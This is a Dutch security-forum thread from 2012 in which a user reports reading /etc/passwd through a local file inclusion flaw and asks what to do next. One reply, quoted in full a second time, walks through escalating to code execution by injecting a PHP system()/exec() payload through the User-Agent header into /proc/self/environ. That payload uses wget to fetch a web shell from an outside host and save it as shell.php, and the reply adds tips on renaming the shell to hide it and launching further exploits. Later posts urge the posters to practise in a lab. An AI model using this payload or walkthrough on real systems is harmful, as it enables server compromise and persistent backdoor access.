Computerbeveiliging - Hoe je bad guys buiten de deur houdt

LFI help

29-08-2012, 18:24 door blackyy, 11 reacties
Hoi,

ik wil graag wat meer weten over LFI

Ik heb een demo site getest en ik zie alleen een grote hoeveelheid data:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP

Wat kan je hiermee?

Dank alvast
Reacties (11)
29-08-2012, 20:04 door Security Scene Team
je hebt de /etc/passwd file "geincluded" probeer eens in je LFI code "proc/self/environ" zonder de quotes dan he......
als je een blanco pagina of een error bericht krijgt kunnen dat 2 dingen betekenen of de OS is freeBSD of proc/self/environ is niet toegankelijk. nouja de waarde van die bestanden in /etc/passwd hangt af van jou kennis, en je type aanval. pentesters gebruikers het o.a bij het verkennen van het systeem als er een kleine LFI ontstaat die dit mogelijk kan maken. maar goed, waar jij naar zoekt denk ik is toegang tot jouw "test" server. goed, ik ga er vanuit dat jij geen kwaad in de zin hebt en geen illegale dingen doet, dus alle ellende die je hiermee creëert is voor jou zelf, ik ben niet verantwoordelijk voor jou eigen domme fouten. (ik zeg het maar even)

goed, nu gaan we (proberen) om op jouw test server, wanneer je het bovenstaande voor proc/self/environ succesvol hebt afgerond een kwaadaardige code injecteren. dit kan je doen via 'user-agent http header'. gebruik Tamper data Addon (voor Firefox Ofc) start tamper data en ga naar de map proc/self/environ via je LFI. Klik dan op Tamper bij uger-agent vul je dit in: <?system(‘wget http://hier-de-site-die-jou-shell-host-in-txt.nl/shells/shellcode.txt -O shell.php’);?> verstuur daarna de request.
als het niet lukt probeer dan exec() inplaatsvan system() omdat system() geblockeert kan zijn d.m.v. php.ini

overigens komt de shell via exec() of system() terrecht in de HTTP directory op de server, en wordt opgeslagen als .php wanneer je gewoon naar http://jeslachtoffersite.nl/shell.php
je kunt shell.php ook veranderen in iets wat meer 'neutraal' is op het systeem.

vanuit je shell kun je verschillende exploits lanceren, Piece of cake.

succes..
29-08-2012, 20:49 door blackyy
Door Security Scene Team: je hebt de /etc/passwd file "geincluded" probeer eens in je LFI code "proc/self/environ" zonder de quotes dan he......
als je een blanco pagina of een error bericht krijgt kunnen dat 2 dingen betekenen of de OS is freeBSD of proc/self/environ is niet toegankelijk. nouja de waarde van die bestanden in /etc/passwd hangt af van jou kennis, en je type aanval. pentesters gebruikers het o.a bij het verkennen van het systeem als er een kleine LFI ontstaat die dit mogelijk kan maken. maar goed, waar jij naar zoekt denk ik is toegang tot jouw "test" server. goed, ik ga er vanuit dat jij geen kwaad in de zin hebt en geen illegale dingen doet, dus alle ellende die je hiermee creëert is voor jou zelf, ik ben niet verantwoordelijk voor jou eigen domme fouten. (ik zeg het maar even)

goed, nu gaan we (proberen) om op jouw test server, wanneer je het bovenstaande voor proc/self/environ succesvol hebt afgerond een kwaadaardige code injecteren. dit kan je doen via 'user-agent http header'. gebruik Tamper data Addon (voor Firefox Ofc) start tamper data en ga naar de map proc/self/environ via je LFI. Klik dan op Tamper bij uger-agent vul je dit in: <?system(‘wget http://hier-de-site-die-jou-shell-host-in-txt.nl/shells/shellcode.txt -O shell.php’);?> verstuur daarna de request.
als het niet lukt probeer dan exec() inplaatsvan system() omdat system() geblockeert kan zijn d.m.v. php.ini

overigens komt de shell via exec() of system() terrecht in de HTTP directory op de server, en wordt opgeslagen als .php wanneer je gewoon naar http://jeslachtoffersite.nl/shell.php
je kunt shell.php ook veranderen in iets wat meer 'neutraal' is op het systeem.

vanuit je shell kun je verschillende exploits lanceren, Piece of cake.

succes..

Hartelijk dank, nee ik doe niet illegaal. ik wil meer leren over IT security
29-08-2012, 21:03 door blackyy
Als ik Tamper data Addon download krijg ik een xpi bestand die je niet kunt openen?
Help
29-08-2012, 21:22 door MisterX
heb je die testwebsite zelf in elkaar 'geknutseld' of kan je die ergens downloaden ?

mvg
30-08-2012, 11:00 door blackyy
Door MisterX: heb je die testwebsite zelf in elkaar 'geknutseld' of kan je die ergens downloaden ?

mvg
Met usbwebserver kun je php bestanden mee werken http://www.usbwebserver.net/nl/
30-08-2012, 16:31 door MisterX
ik bedoel de php bestanden zelf met de 'lekke code', heb je die zelf geprogrammeerd of heb je die ergens gedownload om vervolgens tot je test website uit te komen.

mvg
30-08-2012, 20:03 door Security Scene Team
Door blackyy: Als ik Tamper data Addon download krijg ik een xpi bestand die je niet kunt openen?
Help

Misschien incompatible versie van firefox? oude versie? of te nieuwe versie voor de tamper data versie?
30-08-2012, 20:08 door Security Scene Team
Door MisterX: ik bedoel de php bestanden zelf met de 'lekke code', heb je die zelf geprogrammeerd of heb je die ergens gedownload om vervolgens tot je test website uit te komen.

mvg

ik denk dat hij gewoon eventjes wat zit te spelen op internet, zoals velen van ons doen. ik heb hier niks op tegen, zolang je maar onthoud dat je geen schade maakt, en dit altijd netjes meld bij de server owner.

Toch raad ik je aan om een virtuele server op te zetten, (of een ouwe pc gebruiken kan ook) en dit bewust te installeren met lekker software, Bijv de FTPD versie van Acid burn, daarin zit een backdoor. simpel maar leuk om mee te spelen en van te leren natuurlijk.

nogmaals: schaad nooit een ander zijn intellectuele eigendommen op internet. je kunt en mag er van leren, maar zorg dat je dit dan ook verbeterd. Ook dat geeft een zeer goed gevoel dat je iets verbeterd hebt ;) ipv "Ik heb dit gehackt en gedefaced, check mij 1337 zijn"

Oh en ja: misschien nog 'n tip voor reaguurders, is dat er hier moderators & Administrators rond lopen en elke post checken op ongewenste inhoud. als dit niet had gemogen, hadden ze het allang verwijdert. dus leer, lees, en ga niet oordelen hier. dat doen de mods en admins wel. (continu oordelen staat je onwikkeling namelijk ook in de weg)
30-08-2012, 20:43 door Anoniem
Ik ben gewoon geïnteresseerd in de php code zodat ik ook een test omgeving kan opzetten voor mezelf...

niks meer, niks minder :-s
30-08-2012, 20:44 door MisterX
ik ben gewoon geïnteresseerd in de php code zodat ik zelf een test omgeving kan opzetten voor mezelf.

als je ergens zo een test project kan downloaden is dat nog zo handig en dat was dus gewoon mijn vraag

niks meer, niks minder..

Door Security Scene Team: continu oordelen staat je onwikkeling namelijk ook in de weg
euh.. ok.. haha :-)
31-08-2012, 11:52 door Security Scene Team
Door MisterX: ik ben gewoon geïnteresseerd in de php code zodat ik zelf een test omgeving kan opzetten voor mezelf.

als je ergens zo een test project kan downloaden is dat nog zo handig en dat was dus gewoon mijn vraag

niks meer, niks minder..

Door Security Scene Team: continu oordelen staat je onwikkeling namelijk ook in de weg
euh.. ok.. haha :-)

Oké je bent dus niks verschillend als de rest van ons.

en met dat laatste bedoelde ik eigen meer als knipoog naar de rest van de lezers, omdat sommige mensen heel erg veel oordelen hier maar nooit een helpende bericht plaatsen. en dat staat hun ontwikkeling in de weg ;)

Succes
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.